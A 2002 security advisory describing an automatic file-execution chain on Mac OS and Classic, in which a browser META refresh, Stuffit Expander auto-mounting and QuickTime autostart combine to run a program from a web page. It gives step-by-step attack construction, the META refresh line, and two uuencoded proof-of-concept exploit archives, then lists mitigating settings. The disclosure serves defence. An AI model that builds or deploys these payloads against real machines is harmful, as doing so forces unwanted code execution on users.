|
|
28th Feb 2002
COMMAND
Arbitrary file executions
SYSTEMS AFFECTED
Mac OS and Mac OS X with Classic Environment
Details :
=======
MacOS 9.x, and Mac OS X with Classic environment*1
(probably System 7.5.x or higher)
Quick Time 2.0 or higher version (probably)*2
Stuffit Expander 5.x or higher version for Mac OS
Stuffit Expande 6.5 or higher versionr for Mac OS X*3
All browser and network-client using Stuffit Expander in
post-process for download*4
*1: using Mac OS X by oneself is not affected.
*2: "Autostart CD-ROMs" is supported since QuickTime 2.0.
*3: Stuffit Expander 6.0 for X is not affected.
*4: Netscape 6.x and Mozilla shows dialog before download.
*4: OmniWeb 4.1beta11 is vulnerable, but 4.0.6 is not.
*4: We've tested Fetch 3.0.3, NetFinder v2.3.1, Vicomsoft FTP
Client 3.0.1. These are vulnerable.
PROBLEM
vm_converter <vm_converter@mac.com> and FUJII Taiyo
<taiyo@vinet.or.jp>, in their advisory
[http://homepage.mac.com/vm_converter/mac_autoexec_vuln.html] :
If victims only browse malicious web-page :
1.Browsers start automatically download a compressed disc-image file
which includes malicious program.
2.Archivers --such like Stuffit Expander-- automatically expand the
compressed file, and mount the disc-image.
3.Mac OS (QuickTime) executes the malicious program included in the
disc-image. It depends on QuickTime settings.
These 3 processes are done full-automatically, and end in an instant.
This vulnerability is based on 3 vulnerabilities, and is generated by
many software's complex relations. To explain the vulnerability, we
summarize these 3 vulnerabilities below.
Vuln.1 (already announced at Bugtraq)
"Macinosh IE file execuion vulerability" [BugTraq] 2002 Jan.22 from
Jass Seljamaa. He reports the vulnerable systems are "IE 5.0, probably
earlier, on Classic systems(below OS X)" in this contribute, however,
the vulnerable system which we found are :
Microsoft Internet Explorer 5.0 through 5.1.3
iCab Pre 2.7 and 2.7.1
This means, malicious users can execute local programs in Macintosh
using web pages. But it's able to only execute programs exist in full
file-path in Macintosh which known by a malicious users.
Vuln.2 (probably announced in Japan only)
Next day to Vuln.1 is reported, a Japanese user, Mr. Mori presents
other vulnerability related to Vuln.1 at "Security Hole memo" (written
in Japanese).
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2002/01.html#20020123_macie
This vulnerability, similar to Vuln.1, is observed when the web pages
in which META-tag mentioned below is used are browsed.
<META HTTP-EQUIV="refresh" CONTENT="1;URL=http://somewhere.com/
some.sit">
Ater these pages are browsed, malicious programs are downloaded
automatically. So, malicious users use combination of Vuln. 1 and Vuln.
2 can force victims to download the program and execute it. But, to
force to execute the program, the malicious users must know the full
file-path of download folders in victims' Macintosh. Vulnerable
browsers (in our test) :
Microsoft Internet Explorer 4.5 through 5.1.3
Netscape Communicator 4.78
Netscape 6.2*1
Mozilla 0.9.7*1
iCab Pre 2.7 and 2.7.1
Opera 5.0
OmniWeb 4.0.6 and 4.1beta11
*1: Netscape 6.2 and Mozilla shows dialog before download.
Vuln. 3 (we found, probably announced in Japan only)
According to Vuln.1 and 2, we found other vulnerability, malicious
users can launch arbitrary programs without to know full file-path.
Step 1 : Make a disk image that contains malicious program.
Step 2 : Compress this disk image file in *.sit form. (*.hqx, *.bin
also effective)
Step 3 : Upload this *.sit file to some website and prepare a web
page using Vuln.1 and 2
Step 4 : Victims browse the web page the *.sit file is downloaded
automatically.*
Step 5 : Stuffit Expander automatically extracts the *.sit file and
mounts the disk image.
Step 6 : The malicious program in the disk image is executed
automatically by browsers.*
*Step 4 is based on Vuln.2 and Step 6 is based on Vuln.1.
Because of using disk image, malicious users are free to file-path of
download folder. It's necessary to only prepare malicious programs and
web pages. In this vulnerability, Stuffit Expander plays an important
role. It does automatic extraction and auto-mount disk images. So, in
consists of Vuln.1, browsers execute the program. vulnerable systems
(in our test) :
Stuffit Expander 5.x through 6.5.1 for Mac OS
Stuffit Expander 6.5 or higher version for Mac OS X*1
Microsoft Internet Explorer 5.0 through 5.1.3
iCab Pre 2.7 and 2.7.1
*1: Stuffit Expander 6.0 for X is not affected.
We make a test page for this vulnerability. Please try it.
http://www.u-struct.com/diary/img/20020126_IE5issue_noJS/
----------------------------------------------------------------------
Auto file execution vulnerability in Mac OS
----------------------------------------------------------------------
According to Vuln.1 to Vuln.3, we explain the "Auto file execution
vulnerability in Mac OS". This vulnerability which we found uses Vuln.2
and 3 but Vuln.1. It is coused by many software's complex relations,
such as browsers (and network-clients) and Stuffit Expander and
QuickTime. It's like the computer-virus "AutoStart9805" using
"Autostart CD-ROMs" of QuickTime. In this way, similar to Vuln.3,
malicious users can launch arbitrary programs without to know full
file-path.
Step 1 : Make a disk image that contains "autostart" malicious
program.
Step 2 : Compress this disk image file in *.sit form. (*.hqx, *.bin
also effective)
Step 3 : Upload this *.sit file to some website and prepare a web
page using Vuln. 2.
Step 4 and 5 is same as Vuln. 3.
Step 6 : The program in the image is executed automatically by
"Autostart CD-ROMs" of QuickTime.
In this vulnerability,
1. browser downloads the *.sit in consists of Vuln.2.
2. then, Stuffit Expander does automatic extraction and auto-mount the
disk image.
3. and then, QuickTime executes the program in the image.
These are initial settings of each one. It's a teamwork. Only needs one
click in web page, It will start automatic download, extraction,
mounting, and execution. Furthermore, if victims manually download
malicious disk image with browsers or other network clients (like Fetch
via FTP), automatic extraction, mounting, execution will start.
uuEncode Exploit :
================
From [http://www.u-struct.com/diary/img/20020131_OSissue_E/] :
When your conditions are fulfilled, "Exploit_HD_OSX.img.sit" is
downloaded and extracted, and disk image "Exploit_HD_OSX" is mounted,
and application "openTrash" is launched automatically. "openTrash" is
application that prompt "This application opens trash only" and open
trash only.
begin 644 bad.zip
M4$L#!!0````(`-IE7"R\5S"+.@(``!$%```'````8F%D+FAT;:U436_:0!"]
M1^(_C#BT4A1L2'M*C"4"ED`*N`E.FIZBQ1[C5=:[[G[$X=]W%QM("U*DMI?]
MFITW;][,;C!-YK=AYRR81J.)F^=1,H)IDGSK17</L\=A5V(N415=&,>+)%HD
MP^[@^N'^=EAH75WY?EW7GNDI+4VJO524?D:)W/BT7/N7_?YE?_!E\!POJ5(&
M_>BM8H+JY^G$'CUY]HZGJ.ZZL/XN_DT\^6%GZ)QUSKX7R&$CC(14\(QJ*K@"
M(A%RPW+*&&87\.FG$?KZ-')C`ZH@$S5G@F28`>$9X)N6)-7.WVTSJEZ`EF2-
M)^$.,*4P?.]%JHK1E#A6K9NHD">2J.+@P8CA:>'"&BU*>SDEC&T\EUU0?`T?
M#>,HR8KANQ0#WUJV-U;AC,.<I!`OX2KP5TX@P]S(:-@$N3,T?4EHB:!0:\K7
M;6P+IZ5@4!&.#,*6X<BR4)I(#>-)[SZ>JP/3>.$%*]EB+[7)<ZK!"F%316D!
M*ML(*)&GJ.QNLI=,[<'G3IW&,MM:_A:\,=A<]M!CFPWE!D$+6SQG;;&/P".2
M%G`C1:U0.BQT^P.\/=GUPDXP,,J-1ZPHA\J*U:NDL+34O\6P-!O&R%VUFW6+
MZ&]+^D>YGZ"FNH`Q(TK1%)"_4BEXB5;AHTYH+WW>Q?@_/1&VVIX?$H]UX3)V
M3U`1"T^44ZEAW.IS_G&G49XSXX3*?LOQ(_H>+,4%U.Y/.*6*!>9"PTJ([0O=
MR]B>DSQ']^*]=X*[9?O?V`^H^0A_`5!+`0(6"Q0````(`-IE7"R\5S"+.@(`
M`!$%```'``````````$`(`"`@0````!B860N:'1M4$L%!@`````!``$`-0``
'`%\"````````
`
end
682 bytes
begin 644 Exploit_HD_OSX.img.zip
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
MCP8<```&'```%@```````````"``@($`````17AP;&]I=%](1%]/4U@N:6UG
:+G-I=%!+!08``````0`!`$0````Z'```````
`
end
7316 bytes
SOLUTION
Change the initial settings of each ones below.
In Mac OS : required settings
- "QuickTime setting" control panel > "Autostart CD-ROMs" > turn off.
- Stuffit Expander > preferences > Disk images > "Mount Disk Images"
> turn off.
- Change the initial Volume name (ex. Macintosh HD) to other.
- Change the initial "Download Folder" (ex. Desktop Folder) of
browsers to other.
more secure settings (not required)
- Stuffit Expander > preferences > Expanding > "Continue to expand"
> turn off.
- Each Browsers and network-clients > each preference > change
download setting using Stuffit Expander in post-process to "save
to file"
- Each Browsers > each preference > change download settings to
"disable" *
* such as in Internet Explorer, set the "Security Zones" to "high"
or "custom" (File downloads to "Disable").
In Mac OS X with Classic environment :
- Classic's "QuickTime setting" control panel > "Autostart CD-ROMs"
> turn off.*
- Others are same as in Mac OS.
* "Autostart CD-ROMs" is influenced with Classic's "QuickTime
setting". So, when Classic environment is not booted, Mac OS X is
not affected.